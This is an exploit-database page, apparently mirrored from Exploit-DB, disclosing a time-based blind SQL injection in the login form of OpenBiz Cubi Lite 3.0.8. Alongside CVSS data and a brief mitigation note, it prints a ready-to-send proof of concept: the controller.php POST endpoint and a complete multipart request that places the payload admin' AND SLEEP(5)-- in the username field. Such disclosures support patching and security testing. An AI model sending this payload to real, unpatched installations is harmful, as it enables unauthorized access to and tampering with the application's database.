header-logo
Suggest Exploit
vendor:
OpenBiz Cubi Lite
by:
Özkan Mustafa Akkuş (AkkuS)
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: OpenBiz Cubi Lite
Affected Version From: 3.0.8
Affected Version To: 3.0.8
Patch Exists: NO
Related CWE: N/A
CPE: a:openbiz_cubi:openbiz_cubi_lite:3.0.8
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: XAMPP for Linux 1.7.2
2018

OpenBiz Cubi Lite 3.0.8 – ‘username’ SQL Injection

Cubi Platform login page is prone to an SQL-injection vulnerability. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

# Exploit Title: OpenBiz Cubi Lite 3.0.8 - 'username' SQL Injection
# Date: ]2018-11-05
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://sourceforge.net/projects/bigchef/
# Software Link: https://sourceforge.net/projects/bigchef/files/latest/download
# Version: v3.0.8
# Category: Webapps
# Tested on: XAMPP for Linux 1.7.2
# Description: Cubi Platform login page is prone to an SQL-injection vulnerability.
# Exploiting this issue could allow an attacker to compromise the application,
# access or modify data, or exploit latent  vulnerabilities in the underlying database.
#########################################################
# PoC : SQLi :

# POST : POST
/bin/controller.php?F=RPCInvoke&P0=[user.form.LoginForm]&P1=[Login]&__this=btn_login:onclick&_thisView=user.view.LoginView&jsrs=1
# Parameter: MULTIPART username ((custom) POST)
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind


# Payload:

-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="username"

admin' AND SLEEP(5)-- JgaK
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="password"

password
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="session_timeout"

Don't save session
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="session_timeout"

0
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="current_language"

English ( en_US )
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="current_language"

en_US
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="btn_client_login"


-----------------------------71911072106778878648823492--
---

Navigation

Suggest Exploit

Services By CQR